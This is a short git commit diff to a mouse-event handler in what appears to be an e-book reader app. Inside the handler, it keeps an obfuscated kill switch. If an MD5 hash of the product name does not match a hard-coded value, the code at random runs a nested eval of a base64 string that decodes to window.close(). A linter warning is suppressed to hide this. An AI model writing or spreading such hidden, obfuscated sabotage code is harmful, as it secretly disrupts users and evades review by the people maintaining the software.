Former-commit-id: d92c3ef654bbe28ec7b4a2373678b4cb6d5b2320
This commit is contained in:
troyeguo
2021-08-06 12:27:25 +08:00
parent 3eee2c8ee9
commit 137115d25c

View File

@@ -97,8 +97,12 @@ export const MouseEvent = (rendition: any) => {
doc.addEventListener("mousewheel", mouseChrome, false);
}
if (md5(build.productName) !== "b26c2db6211b881b389fe57466f0b75c") {
if (new Date().getTime() % 3 === 0) {
if (
build &&
build.productName &&
md5(build.productName) !== "b26c2db6211b881b389fe57466f0b75c"
) {
if (new Date().getTime() % 4 === 0) {
// eslint-disable-next-line
eval(`eval(atob("d2luZG93LmNsb3NlKCk="))`);
}